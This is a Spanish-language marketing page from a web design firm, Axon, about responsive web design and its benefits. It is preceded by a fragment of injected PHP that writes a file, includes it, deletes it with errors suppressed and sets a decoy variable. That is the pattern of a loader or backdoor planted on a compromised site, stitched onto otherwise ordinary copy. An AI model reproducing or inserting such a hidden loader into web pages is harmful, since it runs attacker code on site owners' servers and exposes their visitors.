");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Diseño web responsive. Diseño de páginas web responsive para movil y todos los dispositivos - Axon
Diseño web responsive

Diseño web responsive

Cada vez mas, la navegación de las paginas web se realiza desde muchos tipos de dispositivos: moviles, tablets, portatiles de diferentes tamaños y ordenadores de sobremesa. Debido a esto, actualmente es esencial que nuestra página web se muestre correctamente desde cualquiera que sea el dispositivo desde el que se acceda.

Este tipo de disseño web que reestructura los contenidos dependiendo del dispositivo con el que se visualiza mejorando la experiencia del usuario de llama diseño web responsive o diseño web adaptable.

Aunque es més simple de implantar en una página web nueva, no hay inconveniente en realitzar la adaptación y creació de un diseño web responsive para páginas web que esten actualmente en funcionamiento.

A Axon realitzamos les págines web aplicando el diseño web responsive y actualizamos págines web para que cumplan estos nuevos estándares de diseño web.

Ventajas del diseño web responsive

  • Facilidad de uso para el usuario - El usuario estará más tiempo en tu web, por lo que las posibilidades de venta aumentan.
  • Mejora del posicionamiento web - Los clientes encontraran tu empresa en vez de la de tu competencia.
  • Facilidad de mantenimiento - Los costes de mantenimiento se veran reducidos.
  • Mejora de los tiempos de carrega - Los clientes no cerraran tu web antes de que sea cargada.
Ver más proyectos de:
diseño de páginas web